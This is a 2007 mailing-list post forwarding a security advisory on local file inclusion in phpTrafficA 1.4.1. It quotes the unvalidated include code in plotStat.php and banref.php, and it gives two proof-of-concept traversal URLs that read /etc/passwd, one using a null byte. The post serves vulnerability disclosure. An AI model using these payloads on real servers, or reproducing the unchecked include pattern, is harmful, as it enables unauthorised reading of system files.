[VIM] [true] phpTrafficA-1.4.1 Local File Inclusion

Noam Rathaus noamr at beyondsecurity.com
Thu Feb 22 05:38:27 EST 2007 

Appears to be true, however most PHP installation prevent such abuse 
as 'open_basedir restriction in effect' by default.

----------  Forwarded Message  ----------

Subject: phpTrafficA-1.4.1 Local File Inclusion
Date: Wednesday 21 February 2007 21:26
From: "bugtraq ir" <bugtraq.ir at gmail.com>
To: het_ebadi at yahoo.com

phpTrafficA-1.4.1  Local File Inclusion

phpTrafficA is a GPL statistical tool for web traffic analysis, written in
php and mySQL.
It can track access counts to your website, search engines, keywords, and
referrers that lead to you, operating systems, web browsers, visitor
retention, path analysis, and a lot more!

http://soft.zoneo.net/phpTrafficA/


Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

Vulnerable Systems:
Version: phpTrafficA-1.4.1
     phpTrafficA-1.4beta4
     (also tested on phpTrafficA-1.3)

Description:
Input passed to the "file" parameter in "plotStat.php"  and "lang" parameter
in "banref.php" is not  properly verified, before it is used to include
files.
This can be exploited to include/see arbitrary files from local resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
//phpTrafficA/plotStat.php
//Vulnerable Code :line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);



//phpTrafficA/plotStat.php
//Vulnerable Code :line 16
if (!isset($lang) or $lang == "") {
    $lang = $_GET["lang"];
    if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");


POC exploit :
The following URL will cause local file inclusion

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/p
asswd
 http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/pa
sswd%00

# http://www.bugtraq.ir

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com

More information about the VIM mailing list